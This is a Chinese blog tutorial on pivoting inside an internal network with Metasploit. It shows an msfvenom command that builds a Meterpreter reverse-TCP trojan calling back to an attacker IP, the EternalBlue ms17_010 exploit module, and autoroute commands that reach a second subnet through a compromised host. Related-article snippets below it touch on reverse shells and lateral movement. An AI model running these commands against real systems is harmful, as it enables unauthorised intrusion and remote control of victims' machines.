验证内网渗透添加默认路由

最新推荐文章于 2024-05-27 21:19:17 发布
最新推荐文章于 2024-05-27 21:19:17 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/123093147
版权

内网渗透中,如果存在访问不到其它内网主机,而肉鸡又存在双网卡或者多网卡情况,就要考虑在msf中添加静态路由,如下图:

image-20220122141839378

在攻击者A不能直接访问服务器C,但是在拿下内网主机B后,可以通过添加静态路由,借助主机B作为跳板,对服务器C做进一步的渗透

可以通过msfvenom制作一个木马,是肉鸡上线,这里我已经做好了

msfvenom -p  windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=8888 -f exe >shell.exe

image-20220122142605157

直接ping 10.10.10.134是不能ping通的

image-20220122142849173

这里我直接用ms17-010模块攻击扫描提示网络不可达

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 10.10.10.134

image-20220122144035926

在当我添加默认路由后,可以探测到服务器C存在ms17-010漏洞

meterpreter > run get_local_subnets
meterpreter > run autoroute -s 10.10.10.0/24
meterpreter > run autoroute -p

image-20220122145121606

image-20220122145910430

当然也通过命令run post/multi/manage/autoroute添加肉鸡B上的全部路由

image-20220122142944840

另外介绍一下删除添加的路由

route del Subnet Netmask Gateway

image-20220122143612801

明明如月001
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透——路由原理
weixin_44321116的博客
10-13 602
一、路由概述 跨越从源主机到目标主机的一个互联网络来转发数据包的过程(路由器为IP包选择路径的过程) 二、路由表的形成 路由路由维护的路由条目的集合 路由器根据路由表做路径选择 路由表的形成 直连网段 配置ip,端口up状态 非直连网段 对于非直连的网段,需要静态路由或动态路由,将网段添加路由 路由表优化: 三、静态路由 由管理员手工配置的,是单向的 缺乏灵活性 四、默认路由路由器在路由找不到目标网络的路由条目时,路由器把请求转发到默认路由接口上 五、交换与路由对比
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透-路由添加
weixin_44110913的博客
10-19 1118
文章目录前言msf实现路由添加msf查看网卡情况,并且添加路由利用proxychain配合socks4代理渗透 前言 在内网渗透的时候,有时候我们想继续探测内网的资源,但是由于防火墙的原因导致我们无法继续访问内部资源,此时我们就可以考虑添加路由或者端口转发等技术。 msf实现路由添加 msf查看网卡情况,并且添加路由 #获取当前主机下的网络架构分布 run get_local_subnets 添加路由访问 run autoroute -s 192.168.22.0/24 查看当前路由列表 ru
Windows、Linux添加路由
最新发布
yushibing717的博客
05-27 1001
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。原文链接:https://blog.csdn.net/m0_73562288/article/details/139057915。原文链接:https://blog.csdn.net/m0_73562288/article/details/139057915。原文链接:https://blog.csdn.net/m0_73562288/article/details/139057915。
内网渗透-msf及socks代理转发
baynk的博客
05-29 8950
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
解决 ARouter 无法生成路由表,Toast提示 找不到目标路由
Lan_Se_Tian_Ma的博客
10-01 665
2、加载注解库,使用 kapt,不要用 annotationProcessor。3、分模块开发,每个需要用到的模块下面,都需要引入加载注解库。最后总结应该是:Android Studio版本过高的原因。主工程的 build.gradle,引入kapt插件库。Android Studio 版本:2022.3.1。1、先检查 项目路径,是否有文,不要有文;模块自身的build.gradle。ARouter 版本:1.5.2。
使用Metasploit搭建跳板——未更完
渗透测试
06-05 859
文章目录前言一、添加路由项方法一:①功能介绍②具体过程方法二:①介绍功能②具体过程二、进行攻击总结 前言 本文简单介绍了使用metasploit搭建跳板进行攻击 一、添加路由添加路由项功能: 关于路由表,本人对metasploit使用添加路由项并没有深刻理解,仅供参考; 方法一: 使用run autoroute -p/-s ①功能介绍 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Examp
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
agent内网渗透代理相关
04-14
内网渗透代理
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
后渗透工具 – Meterpreter(WEB安全攻防)
小英雄颂人头
03-01 1178
0xx1 后渗透工具 – Meterpreter 优势 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,并且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用 0xx2 进程迁移 ps – 获取目标机器进程 getpid – 查看Meterpreter shell的进程号 migrate – 进程迁移 run post...
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3302
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑病毒在防火墙与服务器等其它类似环境被拦劫下来。在信息技术世界占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
metasploit小白教程总结
sweetie 的博客
01-03 2376
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用:Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
红日靶场一
qq_26947429的博客
07-28 2360
一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网搜集 7.内网--继续信息收集 8.内网攻击姿势--信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞 四、横.
msf监听php反弹shell,使用msf进行反弹shell+内网渗透
weixin_39777242的博客
03-16 1689
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。1、反弹shell:1.首先使用msf的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令以下:“msfvenom -...
meterpreter使用详解
lweiheng blog
01-07 3485
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
CS和MSF联动实现内网横向移动
wuxinweii的博客
10-21 1446
CS和MSF联动实现内网横向移动 ** 实验要求:外网vps一台 cs服务器 msf工具 已经成功拿到shell** 一、使用cs生成EXE文件上传到目标主机直接上线 *1.先使用cs生成一个监听器来监听EXE连接回来的端口 主要配置payload类型和监听主机IP和端口 2.生成一个exe可执行文件 主要配置监听器和类型类型 3.将文件上传到目标直接执行 4.上线成功 二、扫描内网的其他主机 1.使用cs的portcan模块来进行内网其他机器扫描 2.扫描完成后发现内网有很多主机,而这次的目标
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值